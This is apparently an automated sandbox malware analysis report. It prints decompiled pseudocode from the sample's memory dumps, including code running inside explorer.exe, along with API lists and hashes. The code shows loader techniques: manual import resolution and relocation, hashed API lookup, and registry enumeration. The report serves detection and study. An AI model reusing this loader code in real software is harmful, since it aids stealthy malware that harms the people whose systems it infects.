								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(02E50158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(02E50368,00000105), ref: 10005283

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x2ecfaa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x2ecfaa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x2ecfaa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x2ecfaa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 236 Parent PID: 2528 explorer.exeCOMMON

Executed Functions

Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
memset.MSVCRT ref: 0008CFE2
GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
LoadLibraryA.KERNEL32(00000000), ref: 00092551

Strings

kernel32.dll, xrefs: 000924B3
GetProcAddress, xrefs: 000924C1

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x28dfab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x28dfab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x28dfab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x28dfb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x28dfab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x28dfab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000861b4
0x000861b4
0x000861c0
0x000861cf
0x000861d2
0x000861dc
0x000861e4
0x000861e7
0x000861ef
0x000861f1
0x000861f4
0x000861f9
0x00086365
0x00086369
0x00086369
0x00086209
0x0008620b
0x00086211
0x00000000
0x00000000
0x00086234
0x00086333
0x00086337
0x00086339
0x00086341
0x00086341
0x0008634d
0x0008635b
0x00000000
0x00086360
0x0008623d
0x00086241
0x00086245
0x00086249
0x0008624d
0x0008624e
0x0008624f
0x00086250
0x00086251
0x00086255
0x0008625c
0x0008625d
0x00086262
0x0008626d
0x00086282
0x00086284
0x00000000
0x00000000
0x0008628a
0x0008628d
0x00086295
0x000862a2
0x000862a7
0x000862aa
0x000862b3
0x000862ba
0x000862ca
0x000862d4
0x000862da
0x000862dc
0x000862e1
0x000862ea
0x000862ec
0x000862ee
0x000862f0
0x000862fa
0x00086300
0x00086304
0x00086308
0x0008630d
0x00086313
0x00086315
0x00086317
0x00086317
0x0008631e
0x0008631e
0x00086304
0x00086323
0x00086323
0x00086326
0x00086327
0x0008632a
0x0008632a
0x00000000
0x0008628d
0x0008626f
0x00086277
0x00000000

APIs

memset.MSVCRT ref: 000861D2

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
memset.MSVCRT ref: 00086295
memset.MSVCRT ref: 000862A2

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: ba4460bb8acd519904dbb8173c91a319b1b2ed3b390eeb05cbba0b8f8fc73b38
Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
Opcode Fuzzy Hash: ba4460bb8acd519904dbb8173c91a319b1b2ed3b390eeb05cbba0b8f8fc73b38
Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

APIs

LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089

Strings

.dll, xrefs: 0008E079, 0008E07C

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

